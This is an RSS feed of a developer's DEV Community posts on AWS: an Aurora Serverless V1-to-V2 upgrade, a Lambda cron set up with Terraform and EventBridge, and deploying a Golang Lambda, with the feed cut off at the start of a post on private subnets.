<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Rhuaridh</title>
    <description>The latest articles on DEV Community by Rhuaridh (@rhuaridh).</description>
    <link>https://dev.to/rhuaridh</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F110794%2F3513d3d9-6f38-42bb-b745-8a60c22bedf6.jpeg</url>
      <title>DEV Community: Rhuaridh</title>
      <link>https://dev.to/rhuaridh</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rhuaridh"/>
    <language>en</language>
    <item>
      <title>Aurora Serverless V1 to V2 Migration</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 26 Feb 2023 19:31:49 +0000</pubDate>
      <link>https://dev.to/rhuaridh/aurora-serverless-v1-to-v2-migration-1gl2</link>
      <guid>https://dev.to/rhuaridh/aurora-serverless-v1-to-v2-migration-1gl2</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;So you have been enjoying running your MySQL 5.7 compatible database in Aurora Serverless V1. It's serverless, so by definition you don't need to worry about servers. Right?&lt;/p&gt;

&lt;p&gt;Well that story rings true right up until you want to upgrade your Aurora Serverless database to be compatible with MySQL 8.0, then you might notice the checkbox is mysteriously missing for 8.0.&lt;/p&gt;

&lt;p&gt;Let me take you on a &lt;strong&gt;not-so-serverless&lt;/strong&gt; upgrade journey!&lt;/p&gt;

&lt;h2&gt;
  
  
  Upgrade Map
&lt;/h2&gt;

&lt;p&gt;First, take a look at my upgrade map:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwf9xplcvbpeqf3ssaeq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwf9xplcvbpeqf3ssaeq.png" alt="Aurora Serverless V1 to V2 Upgrade"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's right, in order to upgrade a &lt;strong&gt;serverless&lt;/strong&gt; database we need to &lt;strong&gt;provision&lt;/strong&gt; no fewer than 2 servers before making the switch back to &lt;strong&gt;serverless&lt;/strong&gt;.&lt;/p&gt;

&lt;h5&gt;
  
  
  Related Links
&lt;/h5&gt;

&lt;p&gt;From the official docs, here are some helpful links from AWS:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2.upgrade.html#aurora-serverless-v2.upgrade-from-serverless-v1-procedure" rel="noopener noreferrer"&gt;Upgrading from an Aurora Serverless v1 cluster to Aurora Serverless v2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2-administration.html#aurora-serverless-v2-converting-from-provisioned" rel="noopener noreferrer"&gt;Converting a provisioned writer or reader to Aurora Serverless v2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Step 1) Switch to Provisioned
&lt;/h3&gt;

&lt;p&gt;First up, always take a snapshot. Who knows where this winding upgrade path will lead, so having a backup point is vital. &lt;/p&gt;

&lt;p&gt;The snapshot can then be restored as a new &lt;strong&gt;provisioned&lt;/strong&gt; cluster.&lt;/p&gt;
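&lt;p&gt;As a rough sketch of that step from the CLI (the cluster, snapshot and instance names below are placeholders, not from my setup):&lt;/p&gt;

```shell
# Snapshot the existing Serverless V1 cluster
aws rds create-db-cluster-snapshot \
  --db-cluster-identifier my-serverless-v1-cluster \
  --db-cluster-snapshot-identifier pre-upgrade-snapshot

# Restore the snapshot as a provisioned cluster
aws rds restore-db-cluster-from-snapshot \
  --db-cluster-identifier my-provisioned-cluster \
  --snapshot-identifier pre-upgrade-snapshot \
  --engine aurora-mysql \
  --engine-mode provisioned

# The restored cluster has no instances yet, so add a provisioned writer
aws rds create-db-instance \
  --db-instance-identifier my-provisioned-writer \
  --db-cluster-identifier my-provisioned-cluster \
  --db-instance-class db.r5.large \
  --engine aurora-mysql
```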

&lt;h3&gt;
  
  
  Step 2) Upgrade to MySQL 8.0
&lt;/h3&gt;

&lt;p&gt;Provisioned clusters support both 5.7 and 8.0 compatible databases. So we can now modify the instance and select a version compatible with MySQL 8.0.&lt;/p&gt;
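&lt;p&gt;From the CLI, that modification might look like this (identifiers and the target version are illustrative placeholders; pick a valid target for your cluster):&lt;/p&gt;

```shell
# Major version upgrades must be explicitly allowed
aws rds modify-db-cluster \
  --db-cluster-identifier my-provisioned-cluster \
  --engine-version 8.0.mysql_aurora.3.02.2 \
  --allow-major-version-upgrade \
  --apply-immediately
```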

&lt;h5&gt;
  
  
  Why can't I upgrade from 5.7 to 8.0?
&lt;/h5&gt;

&lt;p&gt;If you can see 8.0 as an option then skip this step. If not then read on!&lt;/p&gt;

&lt;p&gt;Different minor versions have different "&lt;em&gt;valid&lt;/em&gt;" upgrade targets. While I'm not sure why AWS doesn't allow certain minor versions to upgrade to 8.0, what I do know is that you can use the following CLI calls to check.&lt;/p&gt;

&lt;p&gt;For example, at the time of writing this &lt;code&gt;5.7.mysql_aurora.2.08.3&lt;/code&gt; doesn't support an &lt;code&gt;8.0&lt;/code&gt; upgrade. You can see this by running the following command and substituting your &lt;code&gt;--engine-version&lt;/code&gt;.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;

aws rds describe-db-engine-versions &lt;span class="nt"&gt;--engine&lt;/span&gt; aurora-mysql &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--engine-version&lt;/span&gt; 5.7.mysql_aurora.2.08.3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'DBEngineVersions[].ValidUpgradeTarget[].EngineVersion'&lt;/span&gt;
&lt;span class="o"&gt;[]&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;But if we perform a minor upgrade to &lt;code&gt;5.7.mysql_aurora.2.09.2&lt;/code&gt; first then we can upgrade to an &lt;code&gt;8.0&lt;/code&gt; version.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;

&lt;p&gt;aws rds describe-db-engine-versions &lt;span class="nt"&gt;--engine&lt;/span&gt; aurora-mysql &lt;span class="se"&gt;&amp;lt;/span&amp;gt;&lt;br&gt;
  &lt;span class="nt"&gt;--engine-version&lt;/span&gt; 5.7.mysql_aurora.2.09.2 &lt;span class="se"&gt;&amp;lt;/span&amp;gt;&lt;br&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'DBEngineVersions[].ValidUpgradeTarget[].EngineVersion'&lt;/span&gt;&lt;br&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.09.3"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.1"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.2"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.3"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.11.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.01.1"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.02.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.02.2"&lt;/span&gt;&lt;br&gt;
&lt;span class="o"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h3&gt;
  
  
  Step 3) Switch to Serverless V2
&lt;/h3&gt;

&lt;p&gt;Now that your provisioned cluster supports MySQL 8.0 you can finally &lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2-administration.html#aurora-serverless-v2-converting-from-provisioned" rel="noopener noreferrer"&gt;convert the writer instance&lt;/a&gt; to &lt;strong&gt;Serverless V2&lt;/strong&gt;!&lt;/p&gt;
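&lt;p&gt;If you prefer the CLI for this step, a hedged sketch looks like this (identifiers and capacity values are placeholders):&lt;/p&gt;

```shell
# Set the Serverless V2 capacity range on the cluster
aws rds modify-db-cluster \
  --db-cluster-identifier my-provisioned-cluster \
  --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=8 \
  --apply-immediately

# Convert the provisioned writer to the special "db.serverless" class
aws rds modify-db-instance \
  --db-instance-identifier my-provisioned-writer \
  --db-instance-class db.serverless \
  --apply-immediately
```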

&lt;p&gt;It only took 3+ database upgrades to perform one MySQL version jump.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Honestly, consider just spinning up a new V2 cluster and using &lt;code&gt;mysqldump&lt;/code&gt; instead. This upgrade path is far too convoluted!&lt;/p&gt;

&lt;p&gt;The only occasion where I would recommend this over the old-fashioned &lt;code&gt;mysqldump&lt;/code&gt; approach is if your database sizes are too large to be quickly exported/imported.&lt;/p&gt;
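&lt;p&gt;For smaller databases, that old-fashioned approach is roughly this (endpoints, user and database name are placeholders):&lt;/p&gt;

```shell
# Consistent dump from the old Serverless V1 cluster
mysqldump --single-transaction -h OLD_V1_ENDPOINT -u admin -p \
  --result-file=dump.sql mydb

# Load into a freshly created Serverless V2 cluster
mysql -h NEW_V2_ENDPOINT -u admin -p mydb -e "source dump.sql"
```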

</description>
      <category>aws</category>
      <category>aurora</category>
      <category>database</category>
    </item>
    <item>
      <title>Lambda Cron Example (Terraform)</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 01 Oct 2022 15:59:26 +0000</pubDate>
      <link>https://dev.to/rhuaridh/lambda-cron-example-terraform-c8k</link>
      <guid>https://dev.to/rhuaridh/lambda-cron-example-terraform-c8k</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;A common issue people experience when transitioning to serverless infrastructure is finding where to configure a cron.&lt;/p&gt;

&lt;p&gt;During this article we will look at using EventBridge to trigger a lambda on a schedule. We will implement this using Terraform.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup Golang Lambda
&lt;/h2&gt;

&lt;p&gt;I will gloss over the section of creating a lambda, as this is something I have covered in &lt;a href="https://rhuaridh.co.uk/blog/deploy-golang-lambda-example.html" rel="noopener noreferrer"&gt;Golang&lt;/a&gt; and &lt;a href="https://rhuaridh.co.uk/blog/deploy-python-lambda-example.html" rel="noopener noreferrer"&gt;Python&lt;/a&gt; already.&lt;/p&gt;

&lt;p&gt;For this example we will use a simple Golang Hello World example.&lt;/p&gt;

&lt;p&gt;Create &lt;strong&gt;main.go&lt;/strong&gt;, then add this golang snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"log"&lt;/span&gt;

    &lt;span class="s"&gt;"context"&lt;/span&gt;

    &lt;span class="s"&gt;"github.com/aws/aws-lambda-go/lambda"&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Golang Lambda executed via Eventbridge Cron"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;lambda&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;handler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we will run these CLI commands to create our .zip file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Initialise our golang project&lt;/span&gt;
go mod init example.com/demo
go get github.com/aws/aws-lambda-go/lambda

&lt;span class="c"&gt;# If you are on a mac, let Go know you want linux&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;GOOS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;linux
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;GOARCH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;amd64
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;CGO_ENABLED&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0

&lt;span class="c"&gt;# Build our lambda&lt;/span&gt;
go build &lt;span class="nt"&gt;-o&lt;/span&gt; hello

&lt;span class="c"&gt;# Zip up our binary ready for terraform&lt;/span&gt;
zip &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt;.zip hello
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setup Terraform
&lt;/h2&gt;

&lt;p&gt;Create &lt;strong&gt;main.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~&amp;gt; 3.0"
    }
  }
}

# Configure the AWS Provider

provider "aws" {
  region = "eu-west-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This just lets terraform know that we want to use the AWS provider, and that we'll be working in the &lt;strong&gt;eu-west-1&lt;/strong&gt; region.&lt;/p&gt;

&lt;p&gt;You can now run this from the CLI to initialise terraform:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;terraform init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Create a Lambda in Terraform
&lt;/h2&gt;

&lt;p&gt;Create &lt;strong&gt;lambda.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create out lambda, using a locally sourced zip file
resource "aws_lambda_function" "demo_lambda_hello_world" {
  function_name = "demo-lambda-hello-world"
  role          = aws_iam_role.demo_lambda_role.arn
  package_type  = "Zip"
  handler       = "hello"
  runtime       = "go1.x"

  filename         = "function.zip"
  source_code_hash = filebase64sha256("function.zip")

  depends_on = [
    aws_iam_role.demo_lambda_role
  ]

  tags = {
    Name = "Demo Lambda Hello World"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Create IAM Role for Lambda
&lt;/h2&gt;

&lt;p&gt;Our lambda will need some basic permissions to work. These might look jarring at first, but they are fairly straightforward once you read through them.&lt;/p&gt;

&lt;p&gt;Essentially, this role will be &lt;strong&gt;assumed&lt;/strong&gt; by our Lambda and give it access to write to &lt;strong&gt;Cloudwatch Logs&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Create &lt;strong&gt;iam.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Store the AWS account_id in a variable so we can reference it in our IAM policy
data "aws_caller_identity" "current" {}
data "aws_region" "current" {}

locals {
  account_id = data.aws_caller_identity.current.account_id
}

# Lambda IAM Role
resource "aws_iam_role" "demo_lambda_role" {
  name = "demo-lambda-role"

  assume_role_policy = jsonencode({
    "Version" : "2012-10-17",
    "Statement" : [
      {
        "Action" : "sts:AssumeRole",
        "Principal" : {
          "Service" : "lambda.amazonaws.com"
        },
        "Effect" : "Allow"
      }
    ]
  })

  inline_policy {
    name = "demo-lambda-policies"
    policy = jsonencode({
      "Version" : "2012-10-17",
      "Statement" : [
        {
          "Effect" : "Allow",
          "Action" : "logs:CreateLogGroup",
          "Resource" : "arn:aws:logs:${data.aws_region.current.name}:${local.account_id}:*"
        },
        {
          "Effect" : "Allow",
          "Action" : [
            "logs:CreateLogStream",
            "logs:PutLogEvents"
          ],
          "Resource" : [
            "arn:aws:logs:${data.aws_region.current.name}:${local.account_id}:log-group:/aws/lambda/*:*"
          ]
        }
      ]
    })
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setup our Cron
&lt;/h2&gt;

&lt;p&gt;Now that we have our lambda setup, we can &lt;a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/reference-cron-and-rate-expressions.html" rel="noopener noreferrer"&gt;set up the cron&lt;/a&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You can either use a cron, for example: &lt;strong&gt;cron(*/5 * * * ? *)&lt;/strong&gt; &lt;/li&gt;
&lt;li&gt;Or; you can use a rate, for example: &lt;strong&gt;rate(5 minutes)&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Create &lt;strong&gt;eventbridge.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create our schedule
resource "aws_cloudwatch_event_rule" "demo_lambda_every_5_minutes" {
  name                = "demo-lambda-every-5-minutes"
  description         = "Fires every 5 minutes"
  schedule_expression = "rate(5 minutes)"
}

# Trigger our lambda based on the schedule
resource "aws_cloudwatch_event_target" "trigger_lambda_on_schedule" {
  rule      = aws_cloudwatch_event_rule.demo_lambda_every_5_minutes.name
  target_id = "lambda"
  arn       = aws_lambda_function.demo_lambda_hello_world.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Add Lambda Permission
&lt;/h2&gt;

&lt;p&gt;In order for our cron to work, we need to let our Lambda know that EventBridge is allowed to invoke it.&lt;/p&gt;

&lt;p&gt;Inside &lt;strong&gt;lambda.tf&lt;/strong&gt;, add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_lambda_permission" "allow_cloudwatch_to_call_split_lambda" {
  statement_id  = "AllowExecutionFromCloudWatch"
  action        = "lambda:InvokeFunction"
  function_name = aws_lambda_function.demo_lambda_hello_world.function_name
  principal     = "events.amazonaws.com"
  source_arn    = aws_cloudwatch_event_rule.demo_lambda_every_5_minutes.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Deploy Terraform
&lt;/h2&gt;

&lt;p&gt;First, run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform plan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, once we're confident we can run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform apply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will now create the resources from the terraform files.&lt;/p&gt;

&lt;h2&gt;
  
  
  Confirm it's running
&lt;/h2&gt;

&lt;p&gt;After it has been running for 5 minutes you can check the Cloudwatch Logs group to confirm it has been triggered.&lt;/p&gt;

&lt;p&gt;To confirm it is working find your Lambda in the console, then select "Monitoring". You should now see your lambda running under "Recent invocations":&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3c9y5krhxm8yxn7653z4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3c9y5krhxm8yxn7653z4.png" alt="Cron Lambda Output"&gt;&lt;/a&gt;&lt;/p&gt;
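&lt;p&gt;Alternatively, you can tail the logs from the CLI (this assumes AWS CLI v2 and the default &lt;code&gt;/aws/lambda/&amp;lt;function-name&amp;gt;&lt;/code&gt; log group naming):&lt;/p&gt;

```shell
# Show recent invocations of our cron lambda
aws logs tail /aws/lambda/demo-lambda-hello-world --since 15m
```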

&lt;h2&gt;
  
  
  Cleanup
&lt;/h2&gt;

&lt;p&gt;If you were just experimenting, remember you can destroy the resources when you're done by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform destroy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;While Lambdas are cheap to invoke, it is always good to keep your account clean to avoid any unnecessary billing.&lt;/p&gt;

&lt;p&gt;And that's it! You have now configured a Lambda cronjob using EventBridge.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>terraform</category>
      <category>lambda</category>
    </item>
    <item>
      <title>Deploy a Golang Lambda</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 06 Aug 2022 18:18:20 +0000</pubDate>
      <link>https://dev.to/rhuaridh/deploy-a-golang-lambda-3c6f</link>
      <guid>https://dev.to/rhuaridh/deploy-a-golang-lambda-3c6f</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Quite often we just want a simple way to build and deploy a Golang Lambda in AWS without using SAM or Serverless.&lt;/p&gt;

&lt;p&gt;We will look at using the CLI to deploy a simple Golang lambda. This example will give us the building blocks to integrate this into a CI/CD pipeline later.&lt;/p&gt;

&lt;h2&gt;
  
  
  Video Walkthrough
&lt;/h2&gt;

&lt;p&gt;The written instructions are below, but here is a quick video walkthrough showing how to deploy the Golang Lambda.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/jktC__3LAYk"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  The Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Prerequisites
&lt;/h3&gt;

&lt;p&gt;This article assumes you have these installed already:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Golang&lt;/li&gt;
&lt;li&gt;AWS CLI&lt;/li&gt;
&lt;li&gt;The jq package for parsing json&lt;/li&gt;
&lt;li&gt;IAM permissions required to deploy the lambda&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2) Create main.go file
&lt;/h3&gt;

&lt;p&gt;Create a file called &lt;strong&gt;main.go&lt;/strong&gt; in the root directory.&lt;/p&gt;

&lt;p&gt;Here is a quick hello world script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
    "log"

    "context"

    "github.com/aws/aws-lambda-go/events"
    "github.com/aws/aws-lambda-go/lambda"
)

func handler(ctx context.Context, request events.APIGatewayProxyRequest) error {
    log.Println("HelloWorld from Golang Lambda")

    return nil
}

func main() {
    lambda.Start(handler)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3) Create Makefile
&lt;/h3&gt;

&lt;p&gt;Create a file called &lt;strong&gt;Makefile&lt;/strong&gt; in the root directory.&lt;/p&gt;

&lt;p&gt;Please edit the parameters for &lt;strong&gt;function name&lt;/strong&gt; and &lt;strong&gt;region&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export GOOS=linux
export GOARCH=amd64
export CGO_ENABLED=0
.DEFAULT_GOAL := deploy

deploy:
    go build -o hello
    zip -r function.zip hello
    aws lambda update-function-code --function-name "BlogHelloWorldExample" --zip-file fileb://function.zip --region="eu-west-1" | jq .    
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you receive the error &lt;code&gt;Makefile:6: *** missing separator. Stop.&lt;/code&gt;, make sure to replace the spaces with tabs.&lt;/p&gt;

&lt;h3&gt;
  
  
  4) Install Golang Dependencies
&lt;/h3&gt;

&lt;p&gt;You only need to do this step once:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go mod init example.com/demo
go get github.com/aws/aws-lambda-go/events
go get github.com/aws/aws-lambda-go/lambda
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5) Run Makefile
&lt;/h3&gt;

&lt;p&gt;Run the following CLI command to build, zip and deploy our example Lambda:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;make deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should now see output similar to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "FunctionName": "BlogHelloWorldExample",
  "FunctionArn": "arn:aws:lambda:eu-west-1:xyz:function:BlogHelloWorldExample",
  "Runtime": "go1.x",
  "Role": "arn:aws:iam::xyz:role/service-role/BlogHelloWorldExample-role-xyz",
  "Handler": "hello",
  "CodeSize": xyz,
  "Description": "",
  "Timeout": 15,
  "MemorySize": 512,
  "LastModified": "2022-06-07T11:09:28.000+0000",
  "CodeSha256": "xyz",
  "Version": "$LATEST",
  "TracingConfig": {
    "Mode": "PassThrough"
  },
  "RevisionId": "xyz",
  "State": "Active",
  "LastUpdateStatus": "InProgress",
  "LastUpdateStatusReason": "The function is being created.",
  "LastUpdateStatusReasonCode": "Creating"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
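&lt;p&gt;Once the update has finished, you can sanity-check the deployment by invoking the function directly (this assumes the same function name and region as the Makefile above):&lt;/p&gt;

```shell
# Invoke the lambda and write its response to response.json
aws lambda invoke \
  --function-name BlogHelloWorldExample \
  --region eu-west-1 \
  response.json
```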



&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;That's it! Your lambda should now be deployed. Hopefully this gives you a quick starting point for building your pipeline.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>lambda</category>
      <category>go</category>
    </item>
    <item>
      <title>Terraform - Place your EC2 instance in a private subnet</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 06 Mar 2022 13:52:33 +0000</pubDate>
      <link>https://dev.to/rhuaridh/terraform-place-your-ec2-instance-in-a-private-subnet-51eh</link>
      <guid>https://dev.to/rhuaridh/terraform-place-your-ec2-instance-in-a-private-subnet-51eh</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;A regular problem in AWS is that everyone is too keen to get started. They use the default VPC provided and place everything inside the public subnet.&lt;/p&gt;

&lt;p&gt;This might work for a basic web app. However, if we have an EC2 instance running a database or any other private resource then we need to find better ways to secure them.&lt;/p&gt;

&lt;h2&gt;
  
  
